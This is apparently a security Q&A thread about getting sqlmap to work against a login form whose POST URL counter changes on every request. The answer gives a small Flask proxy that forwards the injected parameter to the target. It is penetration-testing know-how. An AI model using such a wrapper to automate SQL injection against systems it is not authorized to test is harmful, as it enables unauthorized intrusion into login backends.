
I am testing a website login that is constantly changing its URL after each request. The first request does a POST login request to /login?0-1.FormSubmit, the next login attempt has to POST to /login?1-2.FormSubmit, and so forth.

Is it possible to use sqlmap on this login, even though the URL changes after each request?

Anders
  • Not sure exactly but is this what you are looking for? https://www.packtpub.com/mapt/book/networking_and_servers/9781785284588/5/ch05lvl1sec47/sqlmap-and-url-rewriting – toom Apr 18 '18 at 08:15
  • Hm, don't think so, because this is used to insert the * to point where sqlmap should inject to (as far as I can see, since I can only view a limited part of the page). But I don't want to SQL inject into the `/login?0-1.FormSubmit` URL, since I want to inject into the provided POST parameters. I need a way to increase the two integers in the URL for each request sqlmap does. Understandable? – user7981924 Apr 18 '18 at 14:05

1 Answer

Tools are seldom written generic enough to handle obscure test-cases. It might be tempting to blame the tool for its shortcomings, but more often the problem is obscure/non-generic, and should be solved by other means.

You can solve this problem by creating a small webapp that acts as a proxy between the target application and your tool.

The tool accepts the vulnerable input as a parameter, and forwards it to the application as required.

Here is some untested Python/Flask code to illustrate how this can be done:

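from flask import Flask, request
import requests

# Counter for the two integers in the target's changing URL
i = 0

app = Flask(__name__)

@app.route("/")
def app_proxy():
    global i  # without this, "i += 1" raises UnboundLocalError
    # Value supplied by the tool in the "sqli" query parameter
    sqli = request.args.get("sqli", None)
    data = {"somekey": "someval", "vulnerableparam": sqli}
    # Forward it as POST data to the current URL, e.g. /login?0-1.FormSubmit
    resp = requests.post("http://target.com/login?%s-%s.FormSubmit" % (i, i + 1), data=data)
    i += 1
    return resp.text, resp.status_code

app.run(host="127.0.0.1", port=8008)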

After you have started the Flask app, you should be able to use sqlmap against http://127.0.0.1:8008/?sqli=value

Dog eat cat world